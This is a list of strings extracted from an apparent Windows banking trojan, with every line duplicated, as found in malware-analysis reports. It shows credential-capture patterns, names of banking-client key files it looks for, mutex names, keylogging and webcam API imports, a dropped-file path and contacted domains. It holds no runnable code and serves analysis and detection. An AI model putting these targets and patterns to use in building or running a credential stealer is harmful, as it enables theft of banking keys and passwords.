\clmain.exe
\wclnt.exe
\wclnt.exe
internal_wutex_0xx
internal_wutex_0xx
%s.dbf
%s.dbf
%s.DBF
%s.DBF
pop2://%s:%s@%s:%i
pop2://%s:%s@%s:%i
pop3://%s:%s@%s:%i
pop3://%s:%s@%s:%i
nntp://%s:%s@%s:%i
nntp://%s:%s@%s:%i
PTF://%s:%s@%s:%i
PTF://%s:%s@%s:%i
PTF://anonymous:
PTF://anonymous:
AUTHINFO PASS
AUTHINFO PASS
j_password=
j_password=
pass.log
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edClientLogin=
edUserLogin=
edUserLogin=
edPassword=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
&LOGIN_AUTHORIZATION_CODE=
login=
login=
password=
password=
pass_
pass_
ssleay32.dll
ssleay32.dll
advapi32.dll
advapi32.dll
path.txt
path.txt
keys.zip
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.jpg
%s\d.jpg
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
keys
private.txt
private.txt
public.txt
public.txt
\*.key
\*.key
\self.cer
\self.cer
self.cer
self.cer
self.pub
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.exe
ctunnel.zip
ctunnel.zip
path_ctunnel.txt
path_ctunnel.txt
header.key
header.key
keys99
keys99
\header.key
\header.key
masks2.key
masks2.key
\masks2.key
\masks2.key
masks.key
masks.key
\masks.key
\masks.key
\name.key
\name.key
primary2.key
primary2.key
\primary2.key
\primary2.key
primary.key
primary.key
\primary.key
\primary.key
keys99.zip
keys99.zip
path99.txt
path99.txt
bsi.dll
bsi.dll
&domain=letitbit.net&
&domain=letitbit.net&
cc.txt
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
prv_key.pfx
keys\
keys\
sign.cer
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
sks2xyz.dll
vb_pfx_import
vb_pfx_import
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
secret.key
pubkeys.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
path1.txt
inter.zip
inter.zip
interpro.ini
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{BQQQW777-B777-4e47-8B10-69798A04C732}
Local\{BQQQW777-B777-4e47-8B10-69798A04C732}
cbsmain.dll
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
pass.txt
pass.txt
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
FilialRCon.dll
ISClient.cfg
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
rfk.zip
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
Agava_Client.exe
KeysDiskPath
KeysDiskPath
Agava_Client.ini
Agava_Client.ini
Agava_keys
Agava_keys
keys_path.txt
keys_path.txt
Local\{AA53E2BF-8989-4EEE-9A0D-95CD39DC0A14}
Local\{AA53E2BF-8989-4EEE-9A0D-95CD39DC0A14}
mespro.dll
mespro.dll
AddPSEPrivateKeyEx
AddPSEPrivateKeyEx
core.exe
core.exe
data\id.dbf
data\id.dbf
\data\id.dbf
\data\id.dbf
keys%i.zip
keys%i.zip
path%i.txt
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
cert.pem
cert.pem
Local\{BE3CEFA7-B777-4e47-8B10-69745D04C732}
Local\{BE3CEFA7-B777-4e47-8B10-69745D04C732}
winmm.dll
winmm.dll
1.2.5
1.2.5
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
%s\%s
%s\%s
#webcam
#webcam
#webcam%d
#webcam%d
RFB d.d
RFB d.d
%s (%s)
%s (%s)
d/d/d d:d
d/d/d d:d
password check failed!
password check failed!
WinSCard.dll
WinSCard.dll
SensApi.dll
SensApi.dll
GetTcpTable
GetTcpTable
IPHLPAPI.DLL
IPHLPAPI.DLL
dbghelp.dll
dbghelp.dll
PSAPI.DLL
PSAPI.DLL
NETAPI32.dll
NETAPI32.dll
DNSAPI.dll
DNSAPI.dll
HttpQueryInfoA
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestA
WININET.dll
WININET.dll
WS2_32.dll
WS2_32.dll
SHFileOperationA
SHFileOperationA
SHELL32.dll
SHELL32.dll
SHLWAPI.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetSystemWindowsDirectoryA
WinExec
WinExec
SetThreadExecutionState
SetThreadExecutionState
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
GetKeyboardState
GetKeyboardState
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
GetKeyboardLayoutList
GetKeyboardLayoutList
GetAsyncKeyState
GetAsyncKeyState
GetKeyboardLayout
GetKeyboardLayout
MapVirtualKeyW
MapVirtualKeyW
VkKeyScanW
VkKeyScanW
VkKeyScanExW
VkKeyScanExW
keybd_event
keybd_event
EnumChildWindows
EnumChildWindows
ActivateKeyboardLayout
ActivateKeyboardLayout
SetKeyboardState
SetKeyboardState
USER32.dll
USER32.dll
SetViewportOrgEx
SetViewportOrgEx
GetViewportOrgEx
GetViewportOrgEx
GDI32.dll
GDI32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
RegFlushKey
RegFlushKey
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegDeleteKeyA
RegDeleteKeyA
RegEnumKeyExA
RegEnumKeyExA
RegOpenKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegQueryInfoKeyW
RegEnumKeyExW
RegEnumKeyExW
ADVAPI32.dll
ADVAPI32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
gdiplus.dll
gdiplus.dll
MSVCRT.dll
MSVCRT.dll
AVICAP32.dll
AVICAP32.dll
MSVFW32.dll
MSVFW32.dll
ShellExecuteW
ShellExecuteW
GetProcessHeap
GetProcessHeap
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
;3 #>6.&
;3 #>6.&
'2, / 0&7!4-)1#
'2, / 0&7!4-)1#
SYSTEM!XP7!F9BE9A8A
SYSTEM!XP7!F9BE9A8A
%WinDir%\apppatch\vkyeif.exe
%WinDir%\apppatch\vkyeif.exe
%Documents and Settings%\%current user%\Application Data\
%Documents and Settings%\%current user%\Application Data\
5`6C6Q6}6
5`6C6Q6}6
55
55
;";,;6;
;";,;6;
6&7-737
6&7-737
3"33393>3}3
3"33393>3}3
;#;);/;=;
;#;);/;=;
=}=
=}=
:(:-:8:=:
:(:-:8:=:
7#7)7/7=7
7#7)7/7=7
9&9,929@9
9&9,929@9
0!02090>0
0!02090>0
>$>*>4>9>
>$>*>4>9>
`.data
`.data
Windows Explorer
Windows Explorer
mavast.com
mavast.com
ya.ru
ya.ru
serverkey.dat
serverkey.dat
\windows\
\windows\
dntdll.dll
dntdll.dll
.NET CLR Networking_Perf_Library_Lock_PID_0
.NET CLR Networking_Perf_Library_Lock_PID_0
.NET Data Provider for SqlServer_Perf_Library_Lock_PID_0
.NET Data Provider for SqlServer_Perf_Library_Lock_PID_0
ASP.NET_2.0.50727_Perf_Library_Lock_PID_0
ASP.NET_2.0.50727_Perf_Library_Lock_PID_0
SOFTWARE\JavaSoft\Java Plug-in\1.6.0_%d
SOFTWARE\JavaSoft\Java Plug-in\1.6.0_%d
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings
iexplore.exe
iexplore.exe
HighMemoryEvent_x
HighMemoryEvent_x
MSCTF.Shared.MAPPING.x
MSCTF.Shared.MAPPING.x
MSCTF.Shared.EVENT.x
MSCTF.Shared.EVENT.x
MSCTF.Shared.MUTEX.x
MSCTF.Shared.MUTEX.x
.Prev
.Prev
.current
.current